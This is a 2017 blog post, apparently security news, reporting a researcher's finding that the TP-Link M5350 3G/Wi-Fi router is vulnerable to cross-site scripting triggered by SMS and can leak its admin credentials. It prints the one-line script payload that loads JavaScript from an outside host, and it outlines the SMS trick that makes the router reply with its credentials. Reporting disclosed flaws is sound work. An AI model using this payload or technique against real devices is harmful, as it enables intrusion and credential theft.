Monday, April 10, 2017

How to get admin credentials from TP-Link M5350 3G/Wi-Fi modem with a text message

Some bugs are very strange and dangerous, this is the case of a flaw affecting the TP-Link’s M5350 3G/Wi-Fi router that can expose admin credentials to an evil text message.
The bug was discovered by the security researcher Jan Hörsch from the German firm Securai, basically, it is a cross-site scripting (XSS) vulnerability that could be exploited by an attacker by simply sending an SMS containing the following attack script:
<script src=//n.ms/a.js></script>


“Among other things, he showed that the mobile router from TP-Link M5350 is permanently vulnerable to cross-site scripting, which is triggered by SMS. If an attacker sends an SMS with the appropriate content, the router answers with the login data of the admin – including the password in the plaintext.” reported the Heise.de.
Hörsch conducted an intensive research on various Internet-of-Things devices discovering multiple vulnerabilities. He analyzed the firmware running on several smart objects and discovered multiple bugs easy to exploit, the results of the research were presented at the recent Kaspersky Security Analyst Summit.
The flaw in the TP-Link’s M5350 3G/Wi-Fi modem appears like a feature created by developers, likely for testing purposes, unfortunately, it wasn’t removed in production.
The device’s admin credentials can be retrieved by an attacker with a simple text message, the router replies with admin username, admin password, its SSID, and its login password.
TP-Link M5350 3G/Wi-Fi modem
It is unlikely that the bug has been fixed by TP-Link, giving a look at the firmware download page for the TP-Link M5350 it is possible to verify that the most-recent version for the flawed device is M5350_V2_140115, released in January 2015.
Hörsch also analyzed a Panasonic BM ET200 retina scanner and a Startech modem, both devices affected by flaws.

0 comments:

Post a Comment